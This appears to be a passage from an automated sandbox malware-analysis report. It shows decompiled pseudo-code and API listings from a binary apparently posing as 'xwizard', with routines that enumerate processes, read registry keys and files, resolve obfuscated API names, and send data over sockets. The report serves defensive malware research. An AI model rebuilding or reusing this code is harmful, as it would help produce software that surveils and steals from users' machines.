											_v1216 = _t317;
											_v1236 = _t338;
											_t303 = E00412755( &_v852);
											_t331 = _t303;
											if(_t303 != 0xffffffff) {
												_v1224 = _t303;
												_v1232 = _t308;
												_v1220 = 1;
												_v1228 = _t338;
												_t308 = _t308 + _t331;
												_v1236 =  &_v1164;
												_v1164 = E00412ABF(0);
											}
										}
										_t296 = _v1148;
										if(_t296 != 0) {
											_v1236 = _t296;
											_v1192();
											_push(_t331);
										}
									}
									_v1188 =  &(1[_v1188]);
								}
								L33:
								_t231 = _v1096;
								if(_t231 != 0) {
									_v1180 = _t231;
									_v1136();
									_push(0);
								}
								if(_v1104 != 0) {
									_v1180 =  &_v1104;
									_v1128();
									_push(_t317);
								}
								_push(FreeLibrary(_t334));
								 *_a4 = _t308;
								_t213 = _v1108;
								goto L38;
							}
						}
						L8:
						_v1160 = 0;
						_t308 = 0;
						while(_v1160 < _v1128) {
							_v1200 = 0x10;
							_t317 = _v1124 + _v1160 * 0x38;
							_v1204 =  &_v1096;
							_v1208 = _t317;
							_t329 = _t317;
							if(E004129C0() == 0) {
								WideCharToMultiByte(0, 0,  *(_t329 + 0x10), 0xffffffff,  &_v1080, 0x100, 0, 0);
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_t329 + 0x14)) + 0x20, 0xffffffff,  &_v824, 0x100, 0, 0);
								_t336 =  &_v568;
								WideCharToMultiByte(0, 0,  *((intOrPtr*)(_t329 + 0x18)) + 0x20, 0xffffffff, _t336, 0x100, 0, 0);
								_v1184 = 0;
								_v1188 = 0;
								_v1192 = 0;
								_v1120 = 0;
								_v1180 =  &_v1120;
								_v1196 =  *((intOrPtr*)(_t329 + 0x18));
								_v1204 = _t329;
								_v1200 =  *((intOrPtr*)(_t329 + 0x14));
								_v1208 = _v1132;
								_t263 = _v1148();
								_t342 = _t342 - 0xffffffffffffffc0;
								if(_t263 == 0) {
									_t319 =  &_v344;
									_v1212 = 0;
									_v1216 = 0;
									_v1220 = 0x100;
									_v1224 = _t319;
									_v1228 = 0xffffffff;
									_v1236 = 0;
									 *_t342 = 0;
									_v1184 = _t319;
									_v1232 = _v1152[0x1c] + 0x20;
									WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
									_t342 = _t342 - 0x20;
									_t317 = _v1184;
									_v1224 = _t336;
									_t336 =  &_v1148;
									_v1232 = 2;
									_v1236 = 0x4239a1;
									_v1228 =  &_v856;
									_v1148 = 0;
									_v1220 = _t317;
									 *_t342 = _t336;
									_t271 = E00412755( &_v856);
									_t330 = _t271;
									if(_t271 != 0xffffffff) {
										_v1228 = _t271;
										_v1236 = _t308;
										_v1224 = 1;
										_v1232 = _t336;
										_t308 = _t308 + _t330;
										 *_t342 =  &_v1168;
										_v1168 = E00412ABF(0);
									}
								}
								_t264 = _v1152;
								if(_t264 != 0) {
									 *_t342 = _t264;
									_v1196();
									_push(_t336);
								}
							}
							_v1192 =  &(1[_v1192]);
						}
						goto L33;
					}
				}
			}

0x0040dce9
0x0040dd08
0x0040dd20
0x0040dd26
0x0040dd2e
0x0040dd36
0x0040dd3e
0x0040dd46
0x0040dd46
0x0040dd5c
0x0040dd5e
0x0040dd60
0x0040dd63
0x0040e3aa
0x0040e3b4
0x0040e3b4
0x0040dd83
0x0040dd85
0x0040dd98
0x0040dd9f
0x0040dda6
0x0040ddaa
0x0040ddaf
0x0040ddb2
0x0040ddbd
0x0040ddbf
0x0040ddd2
0x0040ddd9
0x0040dde0
0x0040dde4
0x0040dde9
0x0040ddec
0x0040ddf0
0x0040ddf7
0x0040ddfe
0x0040de02
0x0040de07
0x0040de0a
0x0040de0e
0x0040de15
0x0040de16
0x0040de17
0x0040de1c
0x0040de2a
0x0040de34
0x0040de3e
0x0040de43
0x0040de4c
0x0040de4c
0x00000000
0x0040de53
0x0040de57
0x0040de5f
0x0040de67
0x0040de6a
0x0040de6c
0x0040de71
0x00000000
0x00000000
0x0040de77
0x0040de7f
0x0040de87
0x0040de8f
0x0040de92
0x0040de94
0x0040de99
0x00000000
0x0040dea2
0x0040deaa
0x0040dec0
0x00000000
0x0040deea
0x0040deea
0x0040def2
0x0040e164
0x0040e142
0x0040e14a
0x0040e14e
0x0040e152
0x0040e155
0x0040e15e
0x0040e1b4
0x0040e200
0x0040e208
0x0040e24c
0x0040e258
0x0040e260
0x0040e268
0x0040e270
0x0040e277
0x0040e27e
0x0040e282
0x0040e28a
0x0040e28d
0x0040e291
0x0040e296
0x0040e2a0
0x0040e2a7
0x0040e2af
0x0040e2b7
0x0040e2bf
0x0040e2c3
0x0040e2ce
0x0040e2d6
0x0040e2dd
0x0040e2e4
0x0040e2e8
0x0040e2ed
0x0040e2f0
0x0040e2f4
0x0040e2ff
0x0040e303
0x0040e30b
0x0040e313
0x0040e317
0x0040e31f
0x0040e323
0x0040e326
0x0040e32e
0x0040e330
0x0040e332
0x0040e33a
0x0040e33e
0x0040e346
0x0040e34a
0x0040e34c
0x0040e354
0x0040e354
0x0040e330
0x0040e358
0x0040e35e
0x0040e364
0x0040e367
0x0040e36b
0x0040e36b
0x0040e35e
0x0040e160
0x0040e160
0x0040e371
0x0040e371
0x0040e377
0x0040e379
0x0040e37c
0x0040e380
0x0040e380
0x0040e386
0x0040e38c
0x0040e38f
0x0040e393
0x0040e393
0x0040e39c
0x0040e3a4
0x0040e3a6
0x00000000
0x0040e3a6
0x0040dec0
0x0040deac
0x0040deac
0x0040deb4
0x0040df24
0x0040df02
0x0040df0a
0x0040df0e
0x0040df12
0x0040df15
0x0040df1e
0x0040df74
0x0040dfc0
0x0040dfc8
0x0040e00c
0x0040e018
0x0040e020
0x0040e028
0x0040e030
0x0040e038
0x0040e03f
0x0040e046
0x0040e04a
0x0040e052
0x0040e055
0x0040e059
0x0040e05e
0x0040e068
0x0040e06f
0x0040e077
0x0040e07f
0x0040e087
0x0040e08b
0x0040e096
0x0040e09e
0x0040e0a5
0x0040e0ac
0x0040e0b0
0x0040e0b5
0x0040e0b8
0x0040e0bc
0x0040e0c7
0x0040e0cb
0x0040e0d3
0x0040e0db
0x0040e0df
0x0040e0e7
0x0040e0eb
0x0040e0ee
0x0040e0f6
0x0040e0f8
0x0040e0fa
0x0040e102
0x0040e106
0x0040e10e
0x0040e112
0x0040e114
0x0040e11c
0x0040e11c
0x0040e0f8
0x0040e120
0x0040e126
0x0040e12c
0x0040e12f
0x0040e133
0x0040e133
0x0040e126
0x0040df20
0x0040df20
0x00000000
0x0040df24
0x0040de99

APIs

LoadLibraryA.KERNEL32 ref: 0040DD57
GetProcAddress.KERNEL32(?), ref: 0040DD7C
GetProcAddress.KERNEL32 ref: 0040DD98
GetProcAddress.KERNEL32 ref: 0040DDB6
GetProcAddress.KERNEL32(?,?), ref: 0040DDD2
GetProcAddress.KERNEL32 ref: 0040DDF0
GetProcAddress.KERNEL32 ref: 0040DE0E
FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040E397

Part of subcall function 004132E6: GetVersionExA.KERNEL32 ref: 00413325
Part of subcall function 004132E6: GetSystemMetrics.USER32 ref: 004133FA

WideCharToMultiByte.KERNEL32 ref: 0040DF74
WideCharToMultiByte.KERNEL32 ref: 0040DFC0
WideCharToMultiByte.KERNEL32 ref: 0040E00C
WideCharToMultiByte.KERNEL32 ref: 0040E0B0
WideCharToMultiByte.KERNEL32 ref: 0040E1B4
WideCharToMultiByte.KERNEL32 ref: 0040E200
WideCharToMultiByte.KERNEL32 ref: 0040E24C
WideCharToMultiByte.KERNEL32 ref: 0040E2E8

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AddressProc$Library$FreeLoadMetricsSystemVersion
String ID:
API String ID: 4051271034-0
Opcode ID: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
Instruction ID: 0411f2c87eaa10a6bc819440aee1928311a11f64f3fd3897648e7812cf6e01f9
Opcode Fuzzy Hash: 87aafaf84040a22bc4a574d69e3875252030c0c31ccf32c7b5f1b702cec560f4
Instruction Fuzzy Hash: 6802ADB04087419FD310EF6AC58875BBBE4BF84358F108D2EF4948B291E7B9D5898F96

Uniqueness

Uniqueness Score: -1.00%

Function 0040FE8C, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 184
timeprocessCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E0040FE8C(void* __ecx, void* __edx) {
				intOrPtr _v0;
				void* _v8;
				char _v552;
				char _v1068;
				char _v1328;
				long _v1356;
				char _v1360;
				char _v1364;
				char _v1396;
				struct _SYSTEMTIME _v1412;
				intOrPtr _v1420;
				char _v1424;
				int _v1428;
				char _v1432;
				char _v1440;
				FILETIME* _v1448;
				signed int _v1476;
				signed int _v1480;
				signed int _v1484;
				signed int _v1488;
				long _v1492;
				signed int _v1496;
				int _v1500;
				int _v1504;
				void* _v1508;
				void* _t76;
				int _t80;
				void* _t83;
				intOrPtr* _t85;
				void* _t87;
				int _t89;
				int _t90;
				void* _t96;
				int _t98;
				int _t109;
				void* _t118;
				void* _t119;
				void* _t123;
				void* _t124;
				void* _t125;
				void* _t126;
				FILETIME* _t127;
				intOrPtr* _t129;
				void* _t131;
				void* _t132;
				signed int _t135;
				void** _t136;
				void* _t137;

				_t126 = __edx;
				_t125 = __ecx;
				_t136 =  &_v1484;
				_v1496 = 0;
				_t76 = CreateToolhelp32Snapshot(2);
				_push(_t126);
				_push(_t126);
				if(_t76 == 0xffffffff) {
					L3:
					return E00405D7D(_t126, _v0, 0xbf, 0, 0);
				}
				_t123 = _t76;
				_v1360 = 0x128;
				_v1504 = _t123;
				_v1500 =  &_v1360;
				_t80 = Process32First(??, ??);
				_push(_t134);
				if(_t80 != 0) {
					E0041236C( &_v1424, 0x8000);
					_t83 = E004081AA("Ed5FWSQid_4idLCldjfD");
					_t85 = E00407F8E(_t126, E00407F7A(_t126, "psapi.dll"), _t83);
					_t129 = _t85;
					if(_t85 == 0) {
						_t119 = E004081AA("Ed5FWSQid_4idLCldjfD");
						_t129 = E00407F8E(_t126, E00407F7A(_t126, "kernel32.dll"), _t119);
					}
					_t135 =  &_v552;
					do {
						_t87 = OpenProcess(0x410, 0, _v1356);
						_t137 = _t136 - 0xc;
						_t131 = _t87;
						if(_t87 == 0 || _t129 == 0) {
							L10:
							E00412548(_t135, 0x424374, 0x204);
							goto L11;
						} else {
							_v1496 = 0x204;
							_v1500 = _t135;
							_v1504 = 0;
							_v1508 = _t87;
							_t118 =  *_t129();
							_t137 = _t137 - 0x10;
							if(_t118 != 0) {
								L11:
								_t89 =  &_v1432;
								_t127 =  &_v1440;
								_v1508 = _t131;
								_v1492 = _t89;
								_v1496 = _t89;
								_v1500 = _t89;
								_v1504 = _t127;
								_v1448 = _t127;
								_t90 = GetProcessTimes(??, ??, ??, ??, ??);
								_t136 = _t137 - 0x14;
								if(_t90 == 0) {
									L23:
									E00412548( &_v1396, 0x424374, 0x20);
									goto L14;
								}
								_t127 = _v1448;
								if(_v1440 == 0) {
									goto L23;
								}
								_t109 = FileTimeToSystemTime(_t127,  &_v1412);
								_push(_t109);
								_push(_t109);
								_v1500 = "%.2d/%.2d/%d %.2d:%.2d:%.2d";
								_v1504 = 0x20;
								_v1476 = _v1412.wSecond & 0x0000ffff;
								_v1480 = _v1412.wMinute & 0x0000ffff;
								_v1484 = _v1412.wHour & 0x0000ffff;
								_v1488 = _v1412.wYear & 0x0000ffff;
								_v1492 = _v1412.wMonth & 0x0000ffff;
								_v1496 = _v1412.wDay & 0x0000ffff;
								_v1508 =  &_v1396;
								E004127A8();
								goto L14;
							}
							goto L10;
						}
						L14:
						if(_t131 != 0) {
							CloseHandle(_t131);
							_push(_t131);
						}
						_t132 =  &_v1068;
						_v1488 = _t135;
						_v1500 = 0x424376;
						_v1504 = 0x204;
						_v1484 =  &_v1396;
						_v1508 = _t132;
						_v1492 = _v1356;
						_v1496 =  &_v1328;
						_t96 = E004127A8();
						if(_t96 > 0) {
							E00412458( &_v1424, _t127,  &_v1424, _t132, _t96);
						}
						_v1508 = _t123;
						_v1504 =  &_v1364;
						_t98 = Process32Next(??, ??);
						_push(_t125);
						_push(_t125);
					} while (_t98 != 0);
					 *_t136 = _t123;
					CloseHandle(??);
					_push(_t127);
					_t124 =  &_v1428;
					if(_v1420 == 0) {
						_v1500 = 0;
						_v1504 = 0;
						_v1508 = 0xbf;
					} else {
						 *_t136 = _t124;
						_v1500 = E00412540();
						_v1508 = 0xbe;
						_v1504 = _v1428;
					}
					 *_t136 = _v8;
					E00405D7D(_t127);
					 *_t136 = _t124;
					return E004123B1();
				}
				CloseHandle(_t123);
				goto L3;
			}

0x0040fe8c
0x0040fe8c
0x0040fe90
0x0040fe96
0x0040fea5
0x0040fead
0x0040feae
0x0040feaf
0x0040fee0
0x00000000
0x0040ff02
0x0040feb1
0x0040feba
0x0040fec5
0x0040fec8
0x0040fecc
0x0040fed4
0x0040fed5
0x0040ff1b
0x0040ff27
0x0040ff41
0x0040ff48
0x0040ff4a
0x0040ff53
0x0040ff72
0x0040ff72
0x0040ff74
0x0040ff7b
0x0040ff95
0x0040ff9a
0x0040ff9f
0x0040ffa1
0x0040ffc7
0x0040ffda
0x00000000
0x0040ffa7
0x0040ffa7
0x0040ffaf
0x0040ffb3
0x0040ffbb
0x0040ffbe
0x0040ffc0
0x0040ffc5
0x0040ffdf
0x0040ffdf
0x0040ffe3
0x0040ffe7
0x0040ffea
0x0040ffee
0x0040fff2
0x0040fff6
0x0040fffa
0x0040fffe
0x00410003
0x00410008
0x00410167
0x0041017e
0x00000000
0x0041017e
0x00410013
0x00410017
0x00000000
0x00000000
0x00410028
0x0041002d
0x0041002e
0x00410034
0x0041003c
0x00410044
0x0041004d
0x00410056
0x0041005f
0x00410068
0x00410071
0x00410079
0x0041007c
0x00000000
0x0041007c
0x00000000
0x0040ffc5
0x00410081
0x00410083
0x00410088
0x0041008d
0x0041008d
0x00410092
0x00410099
0x0041009d
0x004100a5
0x004100ad
0x004100b8
0x004100bb
0x004100c6
0x004100ca
0x004100d1
0x004100e2
0x004100e2
0x004100ee
0x004100f1
0x004100f5
0x004100fc
0x004100fd
0x004100fd
0x00410104
0x00410107
0x0041010c
0x00410112
0x00410116
0x00410136
0x0041013e
0x00410146
0x00410118
0x00410118
0x00410120
0x00410128
0x00410130
0x00410130
0x00410155
0x00410158
0x0041015d
0x00000000
0x00410160
0x0040feda
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0040FEA5
Process32First.KERNEL32 ref: 0040FECC
CloseHandle.KERNEL32 ref: 0040FEDA

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

OpenProcess.KERNEL32 ref: 0040FF95
GetProcessTimes.KERNEL32 ref: 0040FFFE
FileTimeToSystemTime.KERNEL32 ref: 00410028
CloseHandle.KERNEL32(00000000,00000000), ref: 00410088
Process32Next.KERNEL32 ref: 004100F5
CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 00410107

Strings

vCB, xrefs: 0041009D
tCB, xrefs: 00410173
, xrefs: 0041016B

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CloseHandle$ProcessProcess32Time$CreateFileFirstNextOpenSnapshotSystemTimesToolhelp32_vsnprintf
String ID: $tCB$vCB
API String ID: 1698657367-2528537987
Opcode ID: 29e0c6c4af74bcfaac4a1d46f5b8779cc5999e189975c46573ebb5cc9df879ed
Instruction ID: 6fadafcb3b73e839ba5121377a1d1d4624def229cb7cc3727062cbee2f3d546e
Opcode Fuzzy Hash: 29e0c6c4af74bcfaac4a1d46f5b8779cc5999e189975c46573ebb5cc9df879ed
Instruction Fuzzy Hash: BB81C3B0408741AED720AF25C54566FBBE4AF85748F018D2EF8D887351E7BDC989CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00407302, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 94fileCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00407341
_wfopen.MSVCRT ref: 00407354
MultiByteToWideChar.KERNEL32 ref: 00407397
_wfopen.MSVCRT ref: 004073AC
malloc.MSVCRT ref: 004073CC
fread.MSVCRT ref: 004073EE
fwrite.MSVCRT ref: 0040741C
free.MSVCRT ref: 0040742E
fclose.MSVCRT ref: 0040743F
fclose.MSVCRT ref: 00407447

Strings

\/B, xrefs: 004073A2

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide_wfopenfclose$freadfreefwritemalloc
String ID: \/B
API String ID: 2679953470-271128087
Opcode ID: f9df09af49ca5f034b16166d7e72c9a9dddab051e03add47e39f7c407a03f550
Instruction ID: bd1c24ee40381327b35b8d10bbed57f0e5c37a6e482eaac28a171252adbfc4ce
Opcode Fuzzy Hash: f9df09af49ca5f034b16166d7e72c9a9dddab051e03add47e39f7c407a03f550
Instruction Fuzzy Hash: FC3117B09097059FD710AF76D58526EBBE0BF84348F41883EE4D897382D7789489CB8B

Uniqueness

Uniqueness Score: -1.00%

Function 0040D745, Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 232registryfileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT ref: 0040D769
RegOpenKeyExA.ADVAPI32 ref: 0040D80C
RegCloseKey.ADVAPI32 ref: 0040D858
fclose.MSVCRT ref: 0040DB08

Strings

K, xrefs: 0040D9A5
19B, xrefs: 0040DA99
E, xrefs: 0040D98F
/, xrefs: 0040DA54
, xrefs: 0040D7AF
A, xrefs: 0040D99A

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: CloseOpenfclosefopen
String ID: $/$19B$A$E$K
API String ID: 4197589263-888862201
Opcode ID: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
Instruction ID: b3a366508a3bf55356eea0268f728a85e1b25c4e3c11778993a5dcbc8714eb01
Opcode Fuzzy Hash: 17987caa90f594d4a55626d029de0f9e4765c5bc8f064db7406c04733c776cae
Instruction Fuzzy Hash: B2A1C2B09083419BD710EFA5C18465BBBE0AF85358F00882EF5D897391D7B9D989DF4A

Uniqueness

Uniqueness Score: -1.00%

Function 00410ADA, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 230registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32 ref: 00410B26
RegEnumValueA.ADVAPI32 ref: 00410B7F
RegQueryValueExA.ADVAPI32 ref: 00410BF6
RegQueryValueExA.ADVAPI32 ref: 00410C92

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

RegQueryValueExA.ADVAPI32 ref: 00410DA4
malloc.MSVCRT ref: 00410DBB
RegQueryValueExA.ADVAPI32 ref: 00410DEB
RegCloseKey.ADVAPI32 ref: 00410EAE

Strings

CB, xrefs: 00410E30

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: Value$Query$CloseEnumOpen_vsnprintfmalloc
String ID: CB
API String ID: 4070552197-2813831398
Opcode ID: a8b6e03fbc26fe0353ccbed7377f86956965eacf5a4772a906bd3a7d64d9ff09
Instruction ID: f9e542294e120a942ba3f9c894af39fbc12760f83aa3f443d205d2010ae74b6d
Opcode Fuzzy Hash: a8b6e03fbc26fe0353ccbed7377f86956965eacf5a4772a906bd3a7d64d9ff09
Instruction Fuzzy Hash: E2B16BB45083419FD710EF6AC18479BFBE4BF88744F408D2EE89887351E7B9D5898B86

Uniqueness

Uniqueness Score: -1.00%

Function 00401421, Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 101COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00401428
getenv.MSVCRT ref: 00401559

Part of subcall function 004127A8: _vsnprintf.MSVCRT ref: 004127CC

getenv.MSVCRT ref: 0040159B

Strings

\, xrefs: 00401530
s, xrefs: 00401540
%, xrefs: 00401538
%s\%s.%s, xrefs: 0040145A
s, xrefs: 00401528
%, xrefs: 0040151E
TEMP, xrefs: 00401550

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: getenv$_vsnprintfmalloc
String ID: %$%$%s\%s.%s$TEMP$\$s$s
API String ID: 3160696619-3075679649
Opcode ID: ca09603a6fb3c31e46f94ea190ba63cd36d7fdd7c598f72b2894dd74d252403c
Instruction ID: f04d716bfdf1a3b2f19b14ba05fef692e22545d8b3c1490e52eb58049ae1adaa
Opcode Fuzzy Hash: ca09603a6fb3c31e46f94ea190ba63cd36d7fdd7c598f72b2894dd74d252403c
Instruction Fuzzy Hash: 435196B040C385DEE720EF25D54879EBBE0BF84348F408D2EE5D887281E7B99588DB56

Uniqueness

Uniqueness Score: -1.00%

Function 00408042, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00408094
_wfopen.MSVCRT ref: 004080AE

Part of subcall function 00407FC3: fgetpos.MSVCRT ref: 00407FE9

fgetpos.MSVCRT ref: 004080F0
fsetpos.MSVCRT ref: 00408126
malloc.MSVCRT ref: 00408132
fread.MSVCRT ref: 00408152
realloc.MSVCRT ref: 00408168
fclose.MSVCRT ref: 00408174
fclose.MSVCRT ref: 00408185

Strings

d/B, xrefs: 004080A3

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: fclosefgetpos$ByteCharMultiWide_wfopenfreadfsetposmallocrealloc
String ID: d/B
API String ID: 1812338015-978428479
Opcode ID: 9089e06318853e29848d6abf22137532cc5c9e930021d096596f87134e90177b
Instruction ID: cce78eb31c107fb340ace7c9921005f6624d878254cb06048c37cb8e28fe17a8
Opcode Fuzzy Hash: 9089e06318853e29848d6abf22137532cc5c9e930021d096596f87134e90177b
Instruction Fuzzy Hash: 6031B6B0509705ABD750AF26C68535EBBE4AF84348F01892EE8D89B281D778D54A8F4B

Uniqueness

Uniqueness Score: -1.00%

Function 004093E7, Relevance: 16.7, APIs: 11, Instructions: 177networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00409442

Part of subcall function 004051B5: gethostbyname.WS2_32 ref: 004051C5
Part of subcall function 004051B5: htons.WS2_32 ref: 00405202

connect.WS2_32 ref: 0040948F
send.WS2_32 ref: 004094F4
recv.WS2_32 ref: 00409533

Memory Dump Source

Source File: 0000000E.00000002.863737352.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.863722617.0000000000400000.00000040.00020000.sdmp Download File
Associated: 0000000E.00000002.863773731.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863786946.0000000000427000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.863800308.000000000042B000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863815333.0000000000430000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.863828034.0000000000432000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_xwizard.jbxd

Yara matches

Similarity

API ID: connectgethostbynamehtonsrecvsendsocket
String ID:
API String ID: 2370112503-0
Opcode ID: e07faabcde73fad5de2f234cc241048b4efe75730fad398a918129e32e759b8a
Instruction ID: e31714b0b2c18d3bfe683e3de1011ef27751aa1e39aef002969c9c8643353b02
Opcode Fuzzy Hash: e07faabcde73fad5de2f234cc241048b4efe75730fad398a918129e32e759b8a
Instruction Fuzzy Hash: 1471E8B05087059FD710AF6AC58539ABBE0EF84348F418D2EE4D897392D7BD89898B47

Uniqueness

Uniqueness Score: -1.00%

Function 00411770, Relevance: 15.2, APIs: 10, Instructions: 170
networkCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E00411770(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v16;
				char _v20;
				char _v24;
				int _v28;
				intOrPtr _v36;
				intOrPtr _v56;
				int _v72;
				intOrPtr _v80;
				intOrPtr _v92;
				intOrPtr _v280;
				intOrPtr _v284;
				char _v288;
				intOrPtr _v540;
				intOrPtr _v544;
				char _v548;
				intOrPtr _v552;
				char _v556;
				void* _v560;
				char _v576;
				char _v588;
				char* _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				char _v620;
				intOrPtr _v636;
				intOrPtr _v644;
				intOrPtr _v652;
				int _v656;
				intOrPtr _v660;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v692;
				int _v696;
				intOrPtr _v700;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t59;
				char _t61;
				intOrPtr _t62;
				char _t69;
				int _t70;
				intOrPtr _t72;
				intOrPtr _t75;
				int _t76;
				intOrPtr _t78;
				intOrPtr _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				void* _t87;
				intOrPtr _t88;
				intOrPtr _t89;
				char* _t90;
				void* _t91;
				char* _t92;
				intOrPtr* _t93;
				char _t99;

				_t87 = __ecx;
				_t93 =  &_v604;
				_t56 = malloc(0x4000);
				_v560 = _t56;
				if(_t56 != 0) {
					_t88 = _a4;
					_t57 = _a8;
					if(_t57 < _t88) {
						_t57 = _t88;
					}
